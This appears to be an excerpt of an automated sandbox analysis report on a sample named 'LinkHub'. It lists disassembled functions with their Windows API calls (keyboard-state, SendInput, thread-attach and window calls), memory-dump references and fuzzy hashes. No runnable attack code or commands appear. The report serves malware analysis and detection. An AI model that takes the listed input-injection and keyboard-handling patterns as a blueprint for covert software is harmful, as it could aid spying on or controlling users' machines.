                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 759bb31d001eaade0e5d151966c4e1498cbef9dd05a52d83775310ed908a97e9
                                                                    • Instruction ID: 29d13918c15a178483c6012df85f1995c22f6b34df09ff21f7c9958686454131
                                                                    • Opcode Fuzzy Hash: 759bb31d001eaade0e5d151966c4e1498cbef9dd05a52d83775310ed908a97e9
                                                                    • Instruction Fuzzy Hash: E5312470A00208EEFF31CA6598057FA7BB6AB49310F05821BF6A6963D2D374CE419761
                                                                    Function 00CDB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CDB5B8
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CDB5D4
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CDB63B
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CDB68D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 4279e9e4f60df2d64e7111c27daf5202695e2db9bb8e75e506b52e39c832b932
                                                                    • Instruction ID: 58e54bfbf900bc8c4260e2bd3c232141dbe16dcd7fdb4a839a6505d71ab9698b
                                                                    • Opcode Fuzzy Hash: 4279e9e4f60df2d64e7111c27daf5202695e2db9bb8e75e506b52e39c832b932
                                                                    • Instruction Fuzzy Hash: B931083094060CEEFF288B658805BFABBA6AF85310F05422BF695963D1D774CF479B61
                                                                    Function 00D080AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 00D080D4
                                                                    • GetWindowRect.USER32(?,?), ref: 00D0814A
                                                                    • PtInRect.USER32(?,?,?), ref: 00D0815A
                                                                    • MessageBeep.USER32(00000000), ref: 00D081C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 2e85ef2505648f28990b71ce4e97711061d2c9727d33af91cccb5b95ce33a158
                                                                    • Instruction ID: 52feb37f2838b292cecbfb76fbbdfd647f73ef06bf72883a17e45dc18e2a9aff
                                                                    • Opcode Fuzzy Hash: 2e85ef2505648f28990b71ce4e97711061d2c9727d33af91cccb5b95ce33a158
                                                                    • Instruction Fuzzy Hash: C4414A34A01315EFCB11CF58C884BA9B7B5FF49314F1841A9E999DB3A1CB71A842DF61
                                                                    Function 00D02176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00D02187
                                                                      • Part of subcall function 00CD4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD43AD
                                                                      • Part of subcall function 00CD4393: GetCurrentThreadId.KERNEL32 ref: 00CD43B4
                                                                      • Part of subcall function 00CD4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CD2F00), ref: 00CD43BB
                                                                    • GetCaretPos.USER32(?), ref: 00D0219B
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00D021E8
                                                                    • GetForegroundWindow.USER32 ref: 00D021EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 4cbb1245e9d2bef7fefda899b180b226e0782868b7a0a810006d00ba2de11b09
                                                                    • Instruction ID: 3f7461a103edfa9c1124e6198fc008cac18028a4bf8710c869bd27425a3dc3cb
                                                                    • Opcode Fuzzy Hash: 4cbb1245e9d2bef7fefda899b180b226e0782868b7a0a810006d00ba2de11b09
                                                                    • Instruction Fuzzy Hash: 1A317271D01209AFCB04EFA9C885DAEB7F8EF48304B5480AAE519E7351DB71DE45DBA0
                                                                    Function 00CDE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • _wcslen.LIBCMT ref: 00CDE8E2
                                                                    • _wcslen.LIBCMT ref: 00CDE8F9
                                                                    • _wcslen.LIBCMT ref: 00CDE924
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00CDE92F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                    • String ID:
                                                                    • API String ID: 3763101759-0
                                                                    • Opcode ID: f1459897b24e9f5f6537c28d917d8863bd11d00fac19f2888f099c314f63628f
                                                                    • Instruction ID: c20f900ad8695687982817b011c30cc141b604fcf1a458c942e18be36ffa23c0
                                                                    • Opcode Fuzzy Hash: f1459897b24e9f5f6537c28d917d8863bd11d00fac19f2888f099c314f63628f
                                                                    • Instruction Fuzzy Hash: 0321A171901224AFDB10AFA8D982BAEB7F8EF55360F144065E918BF381D7709E41DBA1
                                                                    Function 00D09A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • GetCursorPos.USER32(?), ref: 00D09A5D
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D09A72
                                                                    • GetCursorPos.USER32(?), ref: 00D09ABA
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00D09AF0
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: aaa466e1481705bc76595f9f084af62830a384aab758298dd54f6b51f90de0f1
                                                                    • Instruction ID: aa357eab51737bc716edf5878db339f3b72c614861eefe02d7f3cf785d14933e
                                                                    • Opcode Fuzzy Hash: aaa466e1481705bc76595f9f084af62830a384aab758298dd54f6b51f90de0f1
                                                                    • Instruction Fuzzy Hash: 2121A035601118AFCF158F94CC68FFABBB5EB0A320F444055F94A872A2D3319950DB70
                                                                    Function 00CDDB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,00D0DC30), ref: 00CDDBA6
                                                                    • GetLastError.KERNEL32 ref: 00CDDBB5
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDDBC4
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00D0DC30), ref: 00CDDC21
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: 2576f7a064ba010613c24943186bd3c3f42b9dfd0a7eee52bcd098b5d39d1104
                                                                    • Instruction ID: 56afd709770d3e4c86744efe49afca284f2d4076f0b082a1e2c7c98e92744253
                                                                    • Opcode Fuzzy Hash: 2576f7a064ba010613c24943186bd3c3f42b9dfd0a7eee52bcd098b5d39d1104
                                                                    • Instruction Fuzzy Hash: 3121A3709143059FC310DF24C88096BBBE8EE99364F104A1FF5AAC73A1D771DA4ADB52
                                                                    Function 00D0321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00D032A6
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D032C0
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D032CE
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00D032DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 1ba0963549e4d391181f23c6dc49f76181fea7a9d60cf36ca45c3321f77ef3f9
                                                                    • Instruction ID: 64f46660a61054521527b508f4e16020f5b7e3e15b41c3980accd304c6b27ebe
                                                                    • Opcode Fuzzy Hash: 1ba0963549e4d391181f23c6dc49f76181fea7a9d60cf36ca45c3321f77ef3f9
                                                                    • Instruction Fuzzy Hash: BA21A131605611AFD7149B24CC45F6ABB99EF85324F28825DF82E8B2D2C771ED41C7E4
                                                                    Function 00CD825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00CD8271,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?), ref: 00CD96F3
                                                                      • Part of subcall function 00CD96E4: lstrcpyW.KERNEL32(00000000,?,?,00CD8271,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD9719
                                                                      • Part of subcall function 00CD96E4: lstrcmpiW.KERNEL32(00000000,?,00CD8271,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?), ref: 00CD974A
                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD828A
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD82B0
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD82EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: f835414ce66465bcf82574ed0c46a53cd0dd412eb7e2be4630eda1c053942dc9
                                                                    • Instruction ID: 06c3915b295e20df2d89b29494cd99857a85b73fb37c5390a77b1800e6468e2f
                                                                    • Opcode Fuzzy Hash: f835414ce66465bcf82574ed0c46a53cd0dd412eb7e2be4630eda1c053942dc9
                                                                    • Instruction Fuzzy Hash: EC11E13A200341ABCB149F78C844A7A77A9FF48750B10402BFA06C7360EF31D911D7A1
                                                                    Function 00D060FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00D0615A
                                                                    • _wcslen.LIBCMT ref: 00D0616C
                                                                    • _wcslen.LIBCMT ref: 00D06177
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D062B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID:
                                                                    • API String ID: 455545452-0
                                                                    • Opcode ID: 71b8da9cc0f4764e5239fc839360cedc2564b73fccfaa44c3f7a035131adbf9c
                                                                    • Instruction ID: c215431c43ea8d49a22810a0b99af75568b3ecf3d09bc1cb292ac278e719b64f
                                                                    • Opcode Fuzzy Hash: 71b8da9cc0f4764e5239fc839360cedc2564b73fccfaa44c3f7a035131adbf9c
                                                                    • Instruction Fuzzy Hash: 6011AF35500219AADB10DFA49C84BEF7BACEF11350B18402AFA59D61C1E774C951DBB1
                                                                    Function 00CA2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e2fbad5db74641b1c906dd242d814f36affc5383016d6ee624bc42eea7084c6
                                                                    • Instruction ID: 9f042a173a5bbbc03e76721ab4ba308354e29409e02c6f7e9f96e42d8d3195ee
                                                                    • Opcode Fuzzy Hash: 3e2fbad5db74641b1c906dd242d814f36affc5383016d6ee624bc42eea7084c6
                                                                    • Instruction Fuzzy Hash: 6D018FB26052277EE62126BC6CC0F67661DDF433BCB350325B531A12D1DF608D409160
                                                                    Function 00CD2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CD2394
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD23A6
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD23BC
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD23D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8e01872ed6c47d8f0e4ef0264bae5b8f9b46c074d05b2d8607ee2fded852da2e
                                                                    • Instruction ID: 66cbdc06776e54890853292b7d52f73917f3b67668b048bfa9fe5b6e1bb96d4b
                                                                    • Opcode Fuzzy Hash: 8e01872ed6c47d8f0e4ef0264bae5b8f9b46c074d05b2d8607ee2fded852da2e
                                                                    • Instruction Fuzzy Hash: 8E11093A900218FFEB119BA5CD85F9DBB78FB08750F200192EA11B7290D771AE10DB94
                                                                    Function 00C71AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C71AF4
                                                                    • GetClientRect.USER32(?,?), ref: 00CB31F9
                                                                    • GetCursorPos.USER32(?), ref: 00CB3203
                                                                    • ScreenToClient.USER32(?,?), ref: 00CB320E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: f05a0ad09ca6298b0a153c1c740ad69251a5edd825573bdaeacfec57c0d551a8
                                                                    • Instruction ID: b5cf39b481f40fce79fc32cb21d0330b80eeb69adec702fa81569f64b421c7ee
                                                                    • Opcode Fuzzy Hash: f05a0ad09ca6298b0a153c1c740ad69251a5edd825573bdaeacfec57c0d551a8
                                                                    • Instruction Fuzzy Hash: 50114831A01119EBCB00DFA8C98A9EE77BDEB05350F504452F91AE3240C731BB91EBB1
                                                                    Function 00CDEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CDEB14
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00CDEB47
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CDEB5D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CDEB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 93a3811d91da0f885674cf65b6d67525b8245c95c539e65a4d448b2467d746a9
                                                                    • Instruction ID: 60bebb5abf7b16d2152d5ac667850aecd249a13e8072437067a57559715f3d29
                                                                    • Opcode Fuzzy Hash: 93a3811d91da0f885674cf65b6d67525b8245c95c539e65a4d448b2467d746a9
                                                                    • Instruction Fuzzy Hash: C211DB76900318BBC701BFA89C09A9F7FBDEB46310F54425BF925E7390D674990487B1
                                                                    Function 00C9D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,?,00C9D369,00000000,00000004,00000000), ref: 00C9D588
                                                                    • GetLastError.KERNEL32 ref: 00C9D594
                                                                    • __dosmaperr.LIBCMT ref: 00C9D59B
                                                                    • ResumeThread.KERNEL32(00000000), ref: 00C9D5B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 173952441-0
                                                                    • Opcode ID: 63d28b07c96b08487a7e963f91eff291c5d531c4934cbd52a195913f13597bf2
                                                                    • Instruction ID: 82bdee9c57bdeb9b45f9a1498b14766e7ea9d22890b9cd86b09d3464ad2a1220
                                                                    • Opcode Fuzzy Hash: 63d28b07c96b08487a7e963f91eff291c5d531c4934cbd52a195913f13597bf2
                                                                    • Instruction Fuzzy Hash: 7301F9B24003147BCF116FA9DC0DBAA7B69EF41335F110219F926E71E0CB708901D7A1
                                                                    Function 00C77873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C778B1
                                                                    • GetStockObject.GDI32(00000011), ref: 00C778C5
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C778CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
